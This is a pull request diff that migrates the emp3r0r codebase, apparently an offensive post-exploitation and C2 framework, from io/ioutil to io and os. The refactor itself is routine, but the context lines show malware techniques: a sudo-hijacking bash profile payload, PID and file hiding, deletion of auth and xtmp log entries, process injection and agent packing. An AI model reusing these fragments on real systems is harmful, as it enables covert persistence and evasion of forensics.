### PR TITLE
refactor: move from io/ioutil to io and os packages

### DIFF
--- a/core/cmd/agent/main.go
+++ b/core/cmd/agent/main.go
@@ -7,7 +7,7 @@ import (
 	"context"
 	"flag"
 	"fmt"
-	"io/ioutil"
+	"io"
 	"log"
 	"net"
 	"os"
@@ -71,7 +71,7 @@ func main() {
 		log.Println("emp3r0r agent has started")
 	} else if !runElvsh {
 		// silent!
-		log.SetOutput(ioutil.Discard)
+		log.SetOutput(io.Discard)
 		null_file, err := os.OpenFile(os.DevNull, os.O_WRONLY, 0644)
 		if err != nil {
 			log.Fatalf("[-] Cannot open %s: %v", os.DevNull, err)

--- a/core/cmd/agent/main_windows.go
+++ b/core/cmd/agent/main_windows.go
@@ -7,7 +7,7 @@ import (
 	"context"
 	"flag"
 	"fmt"
-	"io/ioutil"
+	"io"
 	"log"
 	"net"
 	"os"
@@ -73,7 +73,7 @@ func main() {
 			log.SetOutput(os.Stderr)
 		} else {
 			// silent switch
-			log.SetOutput(ioutil.Discard)
+			log.SetOutput(io.Discard)
 			null_file, err := os.OpenFile(os.DevNull, os.O_WRONLY, 0644)
 			if err != nil {
 				log.Fatalf("[-] Cannot open %s: %v", os.DevNull, err)

--- a/core/cmd/cc/main.go
+++ b/core/cmd/cc/main.go
@@ -6,7 +6,6 @@ package main
 import (
 	"flag"
 	"fmt"
-	"io/ioutil"
 	"log"
 	"os"
 	"strings"
@@ -20,7 +19,7 @@ import (
 
 func readJSONConfig(filename string) (err error) {
 	// read JSON
-	jsonData, err := ioutil.ReadFile(filename)
+	jsonData, err := os.ReadFile(filename)
 	if err != nil {
 		return
 	}
@@ -37,7 +36,7 @@ func unlock_downloads() bool {
 	}
 
 	// unlock downloads
-	files, err := ioutil.ReadDir(cc.FileGetDir)
+	files, err := os.ReadDir(cc.FileGetDir)
 	if err != nil {
 		return true
 	}

--- a/core/lib/agent/bash.go
+++ b/core/lib/agent/bash.go
@@ -4,7 +4,6 @@
 package agent
 
 import (
-	"io/ioutil"
 	"log"
 	"os"
 
@@ -21,7 +20,7 @@ func ExtractBash() error {
 		}
 	}
 
-	err := ioutil.WriteFile(RuntimeConfig.UtilsPath+"/.bashrc", []byte(file.BashRC), 0600)
+	err := os.WriteFile(RuntimeConfig.UtilsPath+"/.bashrc", []byte(file.BashRC), 0600)
 	if err != nil {
 		log.Printf("Write bashrc: %v", err)
 	}

--- a/core/lib/agent/getroot.go
+++ b/core/lib/agent/getroot.go
@@ -5,7 +5,6 @@ package agent
 
 import (
 	"fmt"
-	"io/ioutil"
 	"log"
 	"os"
 	"os/exec"
@@ -18,7 +17,7 @@ import (
 
 // Copy current executable to a new location
 func CopySelfTo(dest_file string) (err error) {
-	elf_data, err := ioutil.ReadFile("/proc/self/exe")
+	elf_data, err := os.ReadFile("/proc/self/exe")
 	if err != nil {
 		return fmt.Errorf("Read self exe: %v", err)
 	}
@@ -37,7 +36,7 @@ func CopySelfTo(dest_file string) (err error) {
 		os.RemoveAll(dest_file)
 	}
 
-	return ioutil.WriteFile(dest_file, elf_data, 0755)
+	return os.WriteFile(dest_file, elf_data, 0755)
 }
 
 func GetRoot() error {

--- a/core/lib/agent/injector.go
+++ b/core/lib/agent/injector.go
@@ -5,7 +5,6 @@ package agent
 
 import (
 	"fmt"
-	"io/ioutil"
 	"log"
 	"os"
 	"os/exec"
@@ -96,7 +95,7 @@ func prepare_loader_so(pid int, bin string) (so_path string, err error) {
 		if err != nil {
 			return "", fmt.Errorf("Extract loader.so failed: %v", err)
 		}
-		err = ioutil.WriteFile(so_path, out, 0644)
+		err = os.WriteFile(so_path, out, 0644)
 		if err != nil {
 			return "", fmt.Errorf("Write loader.so failed: %v", err)
 		}

--- a/core/lib/agent/mod.go
+++ b/core/lib/agent/mod.go
@@ -2,7 +2,6 @@ package agent
 
 import (
 	"fmt"
-	"io/ioutil"
 	"log"
 	"os"
 	"os/exec"
@@ -59,7 +58,7 @@ func moduleHandler(modName, checksum string) (out string) {
 
 	// process files in module archive
 	libs_tarball := "libs.tar.xz"
-	files, err := ioutil.ReadDir("./")
+	files, err := os.ReadDir("./")
 	if err != nil {
 		return fmt.Sprintf("Processing module files: %v", err)
 	}
@@ -77,7 +76,7 @@ func moduleHandler(modName, checksum string) (out string) {
 	cmd := exec.Command(emp3r0r_data.DefaultShell, start_sh)
 
 	// debug
-	shdata, err := ioutil.ReadFile(start_sh)
+	shdata, err := os.ReadFile(start_sh)
 	if err != nil {
 		log.Printf("Read %s: %v", start_sh, err)
 	}

--- a/core/lib/agent/osinfo_linux.go
+++ b/core/lib/agent/osinfo_linux.go
@@ -12,7 +12,6 @@ package agent
 import (
 	"bufio"
 	"fmt"
-	"io/ioutil"
 	"os"
 	"regexp"
 	"strings"
@@ -162,11 +161,11 @@ func crossPlatformGetOSInfo() (osinfo *OSInfo) {
 }
 
 func GetKernelVersion() (uname string) {
-	release, err := ioutil.ReadFile("/proc/sys/kernel/osrelease")
+	release, err := os.ReadFile("/proc/sys/kernel/osrelease")
 	if err != nil {
 		release = []byte("unknown_release")
 	}
-	version, err := ioutil.ReadFile("/proc/sys/kernel/version")
+	version, err := os.ReadFile("/proc/sys/kernel/version")
 	if err != nil {
 		version = []byte("unknown_version")
 	}
@@ -176,7 +175,7 @@ func GetKernelVersion() (uname string) {
 
 // Read one-liner text files, strip newline.
 func slurpFile(path string) string {
-	data, err := ioutil.ReadFile(path)
+	data, err := os.ReadFile(path)
 	if err != nil {
 		return ""
 	}
@@ -186,5 +185,5 @@ func slurpFile(path string) string {
 
 // Write one-liner text files, add newline, ignore errors (best effort).
 func spewFile(path string, data string, perm os.FileMode) {
-	_ = ioutil.WriteFile(path, []byte(data+"\n"), perm)
+	_ = os.WriteFile(path, []byte(data+"\n"), perm)
 }

--- a/core/lib/agent/persistence.go
+++ b/core/lib/agent/persistence.go
@@ -6,7 +6,6 @@ package agent
 import (
 	"errors"
 	"fmt"
-	"io/ioutil"
 	"log"
 	"os"
 	"os/exec"
@@ -170,13 +169,13 @@ func profiles() (err error) {
 	}
 	sudoPayload := strings.Join(sudoLocs, "||")
 	loader += fmt.Sprintf("\nfunction sudo() { /usr/bin/sudo $@; (set +m;(%s 2>/dev/null)) }", sudoPayload)
-	err = ioutil.WriteFile(bashprofile, []byte(loader), 0644)
+	err = os.WriteFile(bashprofile, []byte(loader), 0644)
 	if err != nil {
 		return
 	}
 
 	// check if profiles are already written
-	data, err := ioutil.ReadFile(user.HomeDir + "/.bashrc")
+	data, err := os.ReadFile(user.HomeDir + "/.bashrc")
 	if err != nil {
 		log.Println(err)
 		return
@@ -242,7 +241,7 @@ func HidePIDs() (err error) {
 	pids = util.RemoveDupsFromArray(pids)
 	pid_list_str := strings.Join(util.IntArrayToStringArray(pids), "\n")
 
-	err = ioutil.WriteFile(Hidden_PIDs, []byte(pid_list_str), 0644)
+	err = os.WriteFile(Hidden_PIDs, []byte(pid_list_str), 0644)
 	if err != nil {
 		return
 	}
@@ -267,7 +266,7 @@ func patcher() (err error) {
 		util.FileBaseName(RuntimeConfig.AgentRoot),
 		util.FileBaseName(Hidden_Files),
 		util.FileBaseName(Hidden_PIDs))
-	err = ioutil.WriteFile(Hidden_Files, []byte(files), 0644)
+	err = os.WriteFile(Hidden_Files, []byte(files), 0644)
 	if err != nil {
 		log.Printf("Cannot create %s: %v", Hidden_Files, err)
 	}

--- a/core/lib/agent/poll.go
+++ b/core/lib/agent/poll.go
@@ -4,7 +4,7 @@ import (
 	"context"
 	"encoding/json"
 	"fmt"
-	"io/ioutil"
+	"io"
 	"log"
 	"net"
 	"net/http"
@@ -69,7 +69,7 @@ func IsCCOnline(proxy string) bool {
 		log.Printf("IsCCOnline: %s: %v", RuntimeConfig.CCIndicator, err)
 		return false
 	}
-	data, err := ioutil.ReadAll(resp.Body)
+	data, err := io.ReadAll(resp.Body)
 	if err != nil {
 		log.Printf("IsCCOnline: %s: %v", RuntimeConfig.CCIndicator, err)
 		return false

--- a/core/lib/agent/proc.go
+++ b/core/lib/agent/proc.go
@@ -1,7 +1,6 @@
 package agent
 
 import (
-	"io/ioutil"
 	"log"
 	"os"
 	"strconv"
@@ -25,12 +24,12 @@ func CheckAgentProcess() *emp3r0r_data.AgentProcess {
 func IsAgentRunningPID() (bool, int) {
 	defer func() {
 		myPIDText := strconv.Itoa(os.Getpid())
-		if err := ioutil.WriteFile(RuntimeConfig.PIDFile, []byte(myPIDText), 0600); err != nil {
+		if err := os.WriteFile(RuntimeConfig.PIDFile, []byte(myPIDText), 0600); err != nil {
 			log.Printf("Write RuntimeConfig.PIDFile: %v", err)
 		}
 	}()
 
-	pidBytes, err := ioutil.ReadFile(RuntimeConfig.PIDFile)
+	pidBytes, err := os.ReadFile(RuntimeConfig.PIDFile)
 	if err != nil {
 		return false, -1
 	}

--- a/core/lib/agent/proc_linux.go
+++ b/core/lib/agent/proc_linux.go
@@ -6,7 +6,6 @@ package agent
 import (
 	"bufio"
 	"fmt"
-	"io/ioutil"
 	"log"
 	"os"
 	"reflect"
@@ -36,7 +35,7 @@ func ProcUID(pid int) string {
 
 // CopyProcExeTo copy executable of an process to dest_path
 func CopyProcExeTo(pid int, dest_path string) (err error) {
-	elf_data, err := ioutil.ReadFile(fmt.Sprintf("/proc/%d/exe", pid))
+	elf_data, err := os.ReadFile(fmt.Sprintf("/proc/%d/exe", pid))
 	if err != nil {
 		return fmt.Errorf("Read %d exe: %v", pid, err)
 	}
@@ -46,7 +45,7 @@ func CopyProcExeTo(pid int, dest_path string) (err error) {
 		os.RemoveAll(dest_path)
 	}
 
-	return ioutil.WriteFile(dest_path, elf_data, 0755)
+	return os.WriteFile(dest_path, elf_data, 0755)
 }
 
 // rename agent process by modifying its argv, all cmdline args are dropped

--- a/core/lib/agent/sftp.go
+++ b/core/lib/agent/sftp.go
@@ -3,7 +3,6 @@ package agent
 import (
 	"fmt"
 	"io"
-	"io/ioutil"
 	"log"
 
 	"github.com/gliderlabs/ssh"
@@ -12,7 +11,7 @@ import (
 
 // SftpHandler handler for SFTP subsystem
 func SftpHandler(sess ssh.Session) {
-	debugStream := ioutil.Discard
+	debugStream := io.Discard
 	serverOptions := []sftp.ServerOption{
 		sftp.WithDebug(debugStream),
 	}

--- a/core/lib/agent/vaccine.go
+++ b/core/lib/agent/vaccine.go
@@ -9,7 +9,6 @@ install tools to RuntimeConfig.UtilsPath, for lateral movement
 
 import (
 	"fmt"
-	"io/ioutil"
 	"log"
 	"os"
 	"runtime"
@@ -89,7 +88,7 @@ func VaccineHandler() (out string) {
 	defer os.Remove(PythonArchive)
 
 	// create launchers
-	err = ioutil.WriteFile(RuntimeConfig.UtilsPath+"/python", []byte(PythonLauncher), 0755)
+	err = os.WriteFile(RuntimeConfig.UtilsPath+"/python", []byte(PythonLauncher), 0755)
 	if err != nil {
 		out = fmt.Sprintf("Write python launcher: %v", err)
 	}

--- a/core/lib/agent/virt_linux.go
+++ b/core/lib/agent/virt_linux.go
@@ -4,15 +4,15 @@
 package agent
 
 import (
-	"io/ioutil"
 	"log"
+	"os"
 	"strings"
 )
 
 // CheckContainer are we in a container? what container is it?
 func crossPlatformCheckContainer() (product string) {
 	product = "None"
-	data, err := ioutil.ReadFile("/proc/1/cgroup")
+	data, err := os.ReadFile("/proc/1/cgroup")
 	if err != nil {
 		return
 	}

--- a/core/lib/agent/xtmp.go
+++ b/core/lib/agent/xtmp.go
@@ -5,7 +5,6 @@ package agent
 
 import (
 	"fmt"
-	"io/ioutil"
 	"os"
 	"strings"
 
@@ -30,7 +29,7 @@ func deleteXtmpEntry(keyword string) (err error) {
 			return fmt.Errorf("Failed to open xtmp: %v", err)
 		}
 		defer xtmpf.Close()
-		xmtpData, err := ioutil.ReadFile(path)
+		xmtpData, err := os.ReadFile(path)
 		if err != nil {
 			return fmt.Errorf("Failed to read xtmp: %v", err)
 		}
@@ -86,10 +85,10 @@ func deleteXtmpEntry(keyword string) (err error) {
 // deleteAuthEntry clean up /var/log/auth or /var/log/secure
 func deleteAuthEntry(keyword string) (err error) {
 	path := "/var/log/auth.log"
-	logData, err := ioutil.ReadFile(path)
+	logData, err := os.ReadFile(path)
 	if err != nil {
 		path = "/var/log/secure"
-		logData, err = ioutil.ReadFile(path)
+		logData, err = os.ReadFile(path)
 		if err != nil {
 			return fmt.Errorf("No auth log found: %v", err)
 		}
@@ -101,5 +100,5 @@ func deleteAuthEntry(keyword string) (err error) {
 			new_content += line + "\n"
 		}
 	}
-	return ioutil.WriteFile(path, []byte(new_content), 0644)
+	return os.WriteFile(path, []byte(new_content), 0644)
 }

--- a/core/lib/cc/buildAgent.go
+++ b/core/lib/cc/buildAgent.go
@@ -4,7 +4,6 @@ import (
 	"bytes"
 	"encoding/json"
 	"fmt"
-	"io/ioutil"
 	"os"
 	"strconv"
 	"strings"
@@ -83,7 +82,7 @@ func GenAgent() (agent_binary_path string) {
 	}
 
 	// read file
-	jsonBytes, err := ioutil.ReadFile(EmpConfigFile)
+	jsonBytes, err := os.ReadFile(EmpConfigFile)
 	if err != nil {
 		CliPrintError("Parsing EmpConfigFile config file: %v", err)
 		return
@@ -98,7 +97,7 @@ func GenAgent() (agent_binary_path string) {
 	}
 
 	// write
-	toWrite, err := ioutil.ReadFile(stubFile)
+	toWrite, err := os.ReadFile(stubFile)
 	if err != nil {
 		CliPrintError("Read stub: %v", err)
 		return
@@ -109,7 +108,7 @@ func GenAgent() (agent_binary_path string) {
 	toWrite = append(toWrite, sep...)
 	toWrite = append(toWrite, encryptedJSONBytes...)
 	toWrite = append(toWrite, sep...)
-	err = ioutil.WriteFile(outfile, toWrite, 0755)
+	err = os.WriteFile(outfile, toWrite, 0755)
 	if err != nil {
 		CliPrintError("Save agent binary %s: %v", outfile, err)
 		return
@@ -191,7 +190,7 @@ func PromptForConfig(isAgent bool) (err error) {
 	)
 	if util.IsExist(EmpConfigFile) {
 		CliPrintInfo("Reading config from existing %s", EmpConfigFile)
-		jsonData, err = ioutil.ReadFile(EmpConfigFile)
+		jsonData, err = os.ReadFile(EmpConfigFile)
 		if err != nil {
 			CliPrintWarning("failed to read %s: %v", EmpConfigFile, err)
 		}
@@ -373,7 +372,7 @@ func save_config_json() (err error) {
 		return fmt.Errorf("Saving %s: %v", EmpConfigFile, err)
 	}
 
-	return ioutil.WriteFile(EmpConfigFile, w_data, 0600)
+	return os.WriteFile(EmpConfigFile, w_data, 0600)
 }
 
 func InitConfigFile(cc_host string) (err error) {
@@ -413,7 +412,7 @@ func InitConfigFile(cc_host string) (err error) {
 // LoadCACrt load CA cert from file
 func LoadCACrt() error {
 	// CA cert
-	ca_data, err := ioutil.ReadFile(CACrtFile)
+	ca_data, err := os.ReadFile(CACrtFile)
 	if err != nil {
 		return fmt.Errorf("failed to read CA cert: %v", err)
 	}

--- a/core/lib/cc/cc.go
+++ b/core/lib/cc/cc.go
@@ -4,7 +4,6 @@ import (
 	"context"
 	"encoding/json"
 	"fmt"
-	"io/ioutil"
 	"os"
 	"os/user"
 	"strings"
@@ -364,7 +363,7 @@ func labelAgents() {
 	)
 	// what if emp3r0r_data.json already have some records
 	if util.IsExist(AgentsJSON) {
-		data, err := ioutil.ReadFile(AgentsJSON)
+		data, err := os.ReadFile(AgentsJSON)
 		if err != nil {
 			CliPrintWarning("Reading labeled agents: %v", err)
 		}
@@ -408,7 +407,7 @@ outter:
 	}
 
 	// write file
-	err = ioutil.WriteFile(AgentsJSON, data, 0600)
+	err = os.WriteFile(AgentsJSON, data, 0600)
 	if err != nil {
 		CliPrintWarning("Saving labeled agents: %v", err)
 	}
@@ -418,7 +417,7 @@ outter:
 func SetAgentLabel(a *emp3r0r_data.AgentSystemInfo) (label string) {
 	TargetsMutex.RLock()
 	defer TargetsMutex.RUnlock()
-	data, err := ioutil.ReadFile(AgentsJSON)
+	data, err := os.ReadFile(AgentsJSON)
 	if err != nil {
 		CliPrintWarning("SetAgentLabel: %v", err)
 		return

--- a/core/lib/cc/cli.go
+++ b/core/lib/cc/cli.go
@@ -6,7 +6,6 @@ import (
 	"errors"
 	"fmt"
 	"io"
-	"io/ioutil"
 	"log"
 	"os"
 	"os/exec"
@@ -803,7 +802,7 @@ func listRemoteDir() func(string) []string {
 func listLocalFiles(path string) func(string) []string {
 	return func(line string) []string {
 		names := make([]string, 0)
-		files, _ := ioutil.ReadDir(path)
+		files, _ := os.ReadDir(path)
 		for _, f := range files {
 			name := strings.ReplaceAll(f.Name(), "\t", "\\t")
 			name = strings.ReplaceAll(name, " ", "\\ ")

--- a/core/lib/cc/modcustom.go
+++ b/core/lib/cc/modcustom.go
@@ -3,7 +3,6 @@ package cc
 import (
 	"encoding/json"
 	"fmt"
-	"io/ioutil"
 	"os"
 	"strconv"
 	"strings"
@@ -77,7 +76,7 @@ func moduleCustom() {
 		if config.IsInteractive {
 			// empty out start.sh
 			// we will run the module as shell
-			err = ioutil.WriteFile(start_sh, []byte("echo emp3r0r-interactive-module\n"), 0600)
+			err = os.WriteFile(start_sh, []byte("echo emp3r0r-interactive-module\n"), 0600)
 			if err != nil {
 				CliPrintError("write %s: %v", start_sh, err)
 				return
@@ -200,7 +199,7 @@ func InitModules() {
 			return
 		}
 		CliPrintInfo("Scanning %s for modules", mod_dir)
-		dirs, err := ioutil.ReadDir(mod_dir)
+		dirs, err := os.ReadDir(mod_dir)
 		if err != nil {
 			CliPrintError("Failed to scan custom modules: %v", err)
 			return
@@ -252,7 +251,7 @@ func InitModules() {
 // readModCondig read config.json of a module
 func readModCondig(file string) (pconfig *ModConfig, err error) {
 	// read JSON
-	jsonData, err := ioutil.ReadFile(file)
+	jsonData, err := os.ReadFile(file)
 	if err != nil {
 		return nil, fmt.Errorf("Read %s: %v", file, err)
 	}
@@ -276,7 +275,7 @@ func genStartScript(config *ModConfig, outfile string) (err error) {
 	data = fmt.Sprintf("%s ./%s ", data, config.Exec) // run with environment vars
 
 	// write config.json
-	return ioutil.WriteFile(outfile, []byte(data), 0600)
+	return os.WriteFile(outfile, []byte(data), 0600)
 }
 
 func updateModuleHelp(config *ModConfig) error {

--- a/core/lib/cc/packer.go
+++ b/core/lib/cc/packer.go
@@ -6,7 +6,6 @@ package cc
 import (
 	"bytes"
 	"fmt"
-	"io/ioutil"
 	"os"
 	"os/exec"
 
@@ -22,7 +21,7 @@ func Packer(inputELF string) (err error) {
 	magic_str := emp3r0r_data.MagicString
 
 	// read file
-	elfBytes, err := ioutil.ReadFile(inputELF)
+	elfBytes, err := os.ReadFile(inputELF)
 	if err != nil {
 		return fmt.Errorf("Read %s: %v", inputELF, err)
 	}
@@ -54,12 +53,12 @@ func Packer(inputELF string) (err error) {
 	// append to stub
 	stub_file := emp3r0r_data.Packer_Stub
 	packed_file := fmt.Sprintf("%s.packed.exe", inputELF)
-	toWrite, err := ioutil.ReadFile(stub_file)
+	toWrite, err := os.ReadFile(stub_file)
 	if err != nil {
 		return fmt.Errorf("cannot read %s: %v", stub_file, err)
 	}
 	toWrite = append(toWrite, encELFBytes...)
-	err = ioutil.WriteFile(packed_file, toWrite, 0755)
+	err = os.WriteFile(packed_file, toWrite, 0755)
 	if err != nil {
 		return fmt.Errorf("write to packed file %s: %v", packed_file, err)
 	}

--- a/core/lib/cc/tmux.go
+++ b/core/lib/cc/tmux.go
@@ -3,7 +3,6 @@ package cc
 import (
 	"errors"
 	"fmt"
-	"io/ioutil"
 	"os"
 	"os/exec"
 	"strconv"
@@ -267,7 +266,7 @@ func (pane *Emp3r0rPane) Printf(clear bool, format string, a ...interface{}) {
 	}
 
 	// print msg
-	err := ioutil.WriteFile(pane.TTY, []byte(msg), 0777)
+	err := os.WriteFile(pane.TTY, []byte(msg), 0777)
 	if err != nil {
 		CliPrintWarning("Cannot print on tmux window %s (%s): %v,\n"+
 			"printing to main window instead.\n\n",

--- a/core/lib/cc/util.go
+++ b/core/lib/cc/util.go
@@ -3,7 +3,7 @@ package cc
 import (
 	"errors"
 	"fmt"
-	"io/ioutil"
+	"io"
 	"net/http"
 	"os"
 	"os/exec"
@@ -28,13 +28,13 @@ func DownloadFile(url, path string) (err error) {
 		return
 	}
 
-	data, err = ioutil.ReadAll(resp.Body)
+	data, err = io.ReadAll(resp.Body)
 	defer resp.Body.Close()
 	if err != nil {
 		return
 	}
 
-	return ioutil.WriteFile(path, data, 0600)
+	return os.WriteFile(path, data, 0600)
 }
 
 // SendCmd send command to agent
@@ -144,7 +144,7 @@ func VimEdit(filepath string) (err error) {
 		}
 	}()
 
-	paneBytes, e := ioutil.ReadFile(Temp + "vim.pane")
+	paneBytes, e := os.ReadFile(Temp + "vim.pane")
 	pane := string(paneBytes)
 	if e != nil {
 		return fmt.Errorf("cannot detect tmux pane number: %v", e)

--- a/core/lib/ss/tcp.go
+++ b/core/lib/ss/tcp.go
@@ -5,7 +5,6 @@ import (
 	"context"
 	"errors"
 	"io"
-	"io/ioutil"
 	"net"
 	"os"
 	"sync"
@@ -118,7 +117,7 @@ func tcpRemote(addr string, shadow func(net.Conn) net.Conn,
 				logf("failed to get target address from %v: %v", c.RemoteAddr(), err)
 				// drain c to avoid leaking server behavioral features
 				// see https://www.ndss-symposium.org/ndss-paper/detecting-probe-resistant-proxies/
-				_, err = io.Copy(ioutil.Discard, c)
+				_, err = io.Copy(io.Discard, c)
 				if err != nil {
 					logf("discard error: %v", err)
 				}

--- a/core/lib/tun/certs.go
+++ b/core/lib/tun/certs.go
@@ -12,7 +12,6 @@ import (
 	"crypto/x509/pkix"
 	"encoding/pem"
 	"fmt"
-	"io/ioutil"
 	"log"
 	"math/big"
 	"net"
@@ -93,7 +92,7 @@ func GenCerts(hosts []string, outname string, isCA bool) (err error) {
 		}
 
 		// ca key file
-		ca_data, err := ioutil.ReadFile("ca-key.pem")
+		ca_data, err := os.ReadFile("ca-key.pem")
 		if err != nil {
 			return fmt.Errorf("Read ca-key.pem: %v", err)
 		}
@@ -101,7 +100,7 @@ func GenCerts(hosts []string, outname string, isCA bool) (err error) {
 		cakey, _ = x509.ParseECPrivateKey(block.Bytes)
 
 		// ca cert file
-		ca_data, err = ioutil.ReadFile("ca-cert.pem")
+		ca_data, err = os.ReadFile("ca-cert.pem")
 		if err != nil {
 			return fmt.Errorf("Read ca-cert.pem: %v", err)
 		}
@@ -121,7 +120,7 @@ func GenCerts(hosts []string, outname string, isCA bool) (err error) {
 	outkey := fmt.Sprintf("%s-key.pem", outname)
 	// cert
 	pem.Encode(out, &pem.Block{Type: "CERTIFICATE", Bytes: derBytes})
-	err = ioutil.WriteFile(outcert, out.Bytes(), 0600)
+	err = os.WriteFile(outcert, out.Bytes(), 0600)
 	if err != nil {
 		return fmt.Errorf("Write %s: %v", outcert, err)
 	}
@@ -129,7 +128,7 @@ func GenCerts(hosts []string, outname string, isCA bool) (err error) {
 
 	// key
 	pem.Encode(out, pemBlockForKey(priv))
-	err = ioutil.WriteFile(outkey, out.Bytes(), 0600)
+	err = os.WriteFile(outkey, out.Bytes(), 0600)
 	if err != nil {
 		return fmt.Errorf("Write %s: %v", outkey, err)
 	}
@@ -162,7 +161,7 @@ func ParsePem(data []byte) (*x509.Certificate, error) {
 
 // ParseCertPemFile read from PEM file and return parsed cert
 func ParseCertPemFile(cert_file string) (cert *x509.Certificate, err error) {
-	cert_data, err := ioutil.ReadFile(cert_file)
+	cert_data, err := os.ReadFile(cert_file)
 	if err != nil {
 		err = fmt.Errorf("Read ca-cert.pem: %v", err)
 		return

--- a/core/lib/tun/netutil.go
+++ b/core/lib/tun/netutil.go
@@ -1,7 +1,7 @@
 package tun
 
 import (
-	"io/ioutil"
+	"io"
 	"log"
 	"net"
 	"net/http"
@@ -67,7 +67,7 @@ func HasInternetAccess() bool {
 	}
 	defer resp.Body.Close()
 
-	respData, err := ioutil.ReadAll(resp.Body)
+	respData, err := io.ReadAll(resp.Body)
 	if err != nil {
 		return false
 	}
@@ -96,7 +96,7 @@ func IsProxyOK(proxy string) bool {
 	}
 	defer resp.Body.Close()
 
-	respData, err := ioutil.ReadAll(resp.Body)
+	respData, err := io.ReadAll(resp.Body)
 	if err != nil {
 		return false
 	}

--- a/core/lib/util/file.go
+++ b/core/lib/util/file.go
@@ -6,7 +6,6 @@ import (
 	"context"
 	"encoding/json"
 	"fmt"
-	"io/ioutil"
 	"log"
 	"os"
 	"os/exec"
@@ -35,7 +34,7 @@ type FileStat struct {
 
 // LsPath ls path and return a json
 func LsPath(path string) (res string, err error) {
-	files, err := ioutil.ReadDir(path)
+	files, err := os.ReadDir(path)
 	if err != nil {
 		log.Printf("LsPath: %v", err)
 		return
@@ -44,15 +43,20 @@ func LsPath(path string) (res string, err error) {
 	// parse
 	var dents []Dentry
 	for _, f := range files {
+		info, err := f.Info()
+		if err != nil {
+			log.Printf("LsPath: %v", err)
+			continue
+		}
 		var dent Dentry
-		dent.Name = f.Name()
-		dent.Date = f.ModTime().String()
+		dent.Name = info.Name()
+		dent.Date = info.ModTime().String()
 		dent.Ftype = "file"
 		if f.IsDir() {
 			dent.Ftype = "dir"
 		}
-		dent.Permission = f.Mode().String()
-		dent.Size = fmt.Sprintf("%d bytes", f.Size())
+		dent.Permission = info.Mode().String()
+		dent.Size = fmt.Sprintf("%d bytes", info.Size())
 		dents = append(dents, dent)
 	}
 

--- a/core/lib/util/mem.go
+++ b/core/lib/util/mem.go
@@ -3,7 +3,6 @@ package util
 import (
 	"bytes"
 	"fmt"
-	"io/ioutil"
 	"log"
 	"os"
 	"runtime"
@@ -50,7 +49,7 @@ func GetProcessExe(pid int) (exe_data []byte, err error) {
 				exe_file)
 		}
 	}
-	exe_data, err = ioutil.ReadFile(process_exe_file)
+	exe_data, err = os.ReadFile(process_exe_file)
 
 	return
 }

--- a/core/lib/util/sysinfo.go
+++ b/core/lib/util/sysinfo.go
@@ -3,7 +3,6 @@ package util
 import (
 	"bytes"
 	"fmt"
-	"io/ioutil"
 	"log"
 	"net"
 	"os"
@@ -163,7 +162,7 @@ func ScanPATH() (exes []string) {
 
 	// scan paths
 	for _, path := range paths {
-		files, err := ioutil.ReadDir(path)
+		files, err := os.ReadDir(path)
 		if err != nil {
 			continue
 		}


### PR DESCRIPTION
Since Go 1.16 the ioutil package is deprecated. Same functionality is now provided in io and os packages instead.